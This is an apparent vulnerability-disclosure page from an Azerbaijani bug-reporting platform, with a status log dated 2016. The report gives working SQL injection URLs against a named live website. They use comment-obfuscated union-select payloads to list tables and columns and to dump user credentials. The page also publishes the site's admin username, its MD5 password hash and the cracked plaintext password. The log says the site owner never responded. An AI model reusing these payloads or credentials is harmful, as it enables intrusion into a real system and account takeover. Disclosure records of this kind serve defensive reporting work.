Ətraflı məlumat
SQl inject here: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27%20%2F*!12345union*%2F%20%2F*!12345select*%2F%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--%20-%27
Table names: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(table_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.tables*/+/*!12345where*/+/*!12345table_schema=database()*/--+-%27
USers: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(column_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.columns*/+/*!12345where*/+/*!12345table_name=0x7573657273*/--+-%27
Username and password dump: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(username,0x3a,password)*/,9,10,11+/*!12345from*/+/*!12345users*/--+-%27
username: admin
password: 5edc2995b340ac9fd2cc555e94384c87 md5 hash( makaudit123 )
Skrinşotlar
Qeydlər
-
21 Oktyabr 2016, 14:01
Boşluğun statusu
Mənbədən cavab gəlmədi -
04 Oktyabr 2016, 10:04
Boşluğa bal verildi
Boşluğun tərcüməsi üçün tərcüməçiyə 10 bal verildi -
04 Oktyabr 2016, 10:04
Boşluğa bal verildi
Boşluğun tərcüməsinə görə müəllifə 1 bal verildi -
07 Sentyabr 2016, 13:51
Boşluğun statusu
Mənbəyə boşluq haqqında e-poçt göndərildi -
07 Sentyabr 2016, 11:31
Boşluğa bal verildi
Moderator boşluq üçün 10 ballıq qiymətləndirmə sistemi üzrə 10 bal təyin etdi -
07 Sentyabr 2016, 11:12
Boşluğun statusu
Moderator tərəfindən təsdiq edildi -
06 Sentyabr 2016, 18:03
Boşluq dəyişdirildi
Boşluq "SQL injection" dəyişdirildi -
30 İyun 2016, 14:49
Boşluq imtina edildi
Linklər qeyd edilən məlumatı göstərmir. Zəhmət lmasa screenlər yollayın. -
22 İyun 2016, 12:06
Boşluq əlavə edildi
Boşluq BUGemota əlavə edildi